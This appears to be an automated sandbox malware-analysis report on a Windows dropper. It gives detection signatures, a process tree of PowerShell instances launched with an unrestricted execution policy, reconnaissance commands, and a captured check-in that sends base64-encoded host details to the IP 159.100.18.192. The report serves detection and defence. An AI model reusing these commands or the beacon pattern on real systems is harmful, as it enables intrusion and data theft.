Windows Analysis Report
AyqwnIUrcz.exe

Overview

General Information

Sample name:AyqwnIUrcz.exe
renamed because original name is a hash value
Original sample name:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45.exe
Analysis ID:1574722
MD5:1e047b85b671cc99d941c13865f069db
SHA1:7e23e9ffbdfd30537546385e5cd475f58b06e7ae
SHA256:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45
Tags:ConsolHQLTDexeuser-JAMESWT_MHT

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Drops large PE files
Loading BitLocker PowerShell Module
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • AyqwnIUrcz.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\AyqwnIUrcz.exe" MD5: 1E047B85B671CC99D941C13865F069DB)
    • IoNixNginx.exe (PID: 1964 cmdline: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe MD5: 4DE03596272B7D7B70FF34893D072F21)
      • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 6788 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • IoNixNginx.exe (PID: 3628 cmdline: "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 4DE03596272B7D7B70FF34893D072F21)
      • cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7164 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4456 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1156 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • IoNixNginx.exe (PID: 5076 cmdline: "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 4DE03596272B7D7B70FF34893D072F21)
      • cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 6016 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • powershell.exe (PID: 3640 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5772 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5348 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2260 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4876 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2468 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1056 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7672 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7804 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7812 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7840 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7848 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7884 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7912 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7920 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started Author: frack113: Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentProcessId: 1964, ParentProcessName: IoNixNginx.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 7164, ProcessName: powershell.exe
Source: Process started Author: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5896, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 6788, ProcessName: chcp.com
Source: Process started Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentCommandLine: "C:\Users\user\Desktop\AyqwnIUrcz.exe", ParentImage: C:\Users\user\Desktop\AyqwnIUrcz.exe, ParentProcessId: 6244, ParentProcessName: AyqwnIUrcz.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ProcessId: 1964, ProcessName: IoNixNginx.exe
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentProcessId: 1964, ParentProcessName: IoNixNginx.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 7164, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: AyqwnIUrcz.exe ReversingLabs: Detection: 18%
Source: AyqwnIUrcz.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File created: C:\Users\user~1\AppData\Local\Temp\nslCD8A.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\AyqwnIUrcz.exe File created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\LICENSE.electron.txt
Source: AyqwnIUrcz.exe Static PE information: certificate valid
Source: AyqwnIUrcz.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\resources
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe File opened: C:\Users\user~1
Source: Joe Sandbox View IP Address: 172.64.41.3
Source: unknown TCP traffic detected without corresponding DNS query: 159.100.18.192
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Accept: application/json, text/plain, */* User-Agent: axios/0.27.2 Host: www.google.com Connection: close
Source: global traffic HTTP traffic detected: GET /login.php?event=init&id=cHJlZmluYWw=&data=OCBHQl9bb2JqZWN0IE9iamVjdF1fWU5SODJfdHJ1ZV8xMjgweDEwMjRfV2luZG93cyAxMCBQcm9fMTA4IG1pbnV0ZXMgKDAuODAgaG91cnMpX0M6XFVzZXJzXGZyb250ZGVza18wNjY2NTZfZnJvbnRkZXNrX1dpbmRvd3NfTlRfeDY0XzEwLjAuMTkwNDVfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBfRlJPTlRERVNLLVBDX19JbnRlbDY0IEZhbWlseSA2IE1vZGVsIDE0MyBTdGVwcGluZyA4LCBHZW51aW5lSW50ZWxfQU1ENjRfQzpfMl9DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBcMnB2dFBFUzV0N2FvVjNlWG5Xcnl3eXRGaTEwXElvTml4TmdpbnguZXhl HTTP/1.1 Accept: application/json, text/plain, */* User-Agent: axios/0.27.2 Host: 159.100.18.192 Connection: close
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
Source: AyqwnIUrcz.exe, 00000005.00000000.1276836892.000000000040A000.00000008.00000001.01000000.00000004.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://ok.hu/katalogus?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://pesquisa.sapo.pt/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://pesquisa.sapo.pt/livesapo?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://radce.centrum.cz/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://report-example.test/test
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.avg.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.avg.com/favicon.icohttp://search.avg.com/search?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.avg.com/search?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.babylon.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.babylon.com/favicon.icohttp://search.babylon.com/home?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.babylon.com/home?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.imesh.net/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.imesh.net/favicon.icohttp://search.imesh.net/music?hl=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.imesh.net/music?hl=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.iminent.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.icohttp://search.iminent.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.incredibar.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.incredibar.com/favicon.icohttp://search.incredibar.com/search.php?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.incredibar.com/search.php?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.snapdo.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.softonic.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.icohttp://search.softonic.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.sweetim.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.sweetim.com/favicon.icohttp://search.sweetim.com/search.asp?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.sweetim.com/search.asp?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.tut.by/?ru=1&query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.tut.by/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.tut.by/favicon.icohttp://search.tut.by/?ru=1&query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://search.walla.co.il/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.icohttp://searchfunmoods.com/results.php?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://searchfunmoods.com/results.php?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.icohttp://start.sweetpacks.com/search.asp?q=
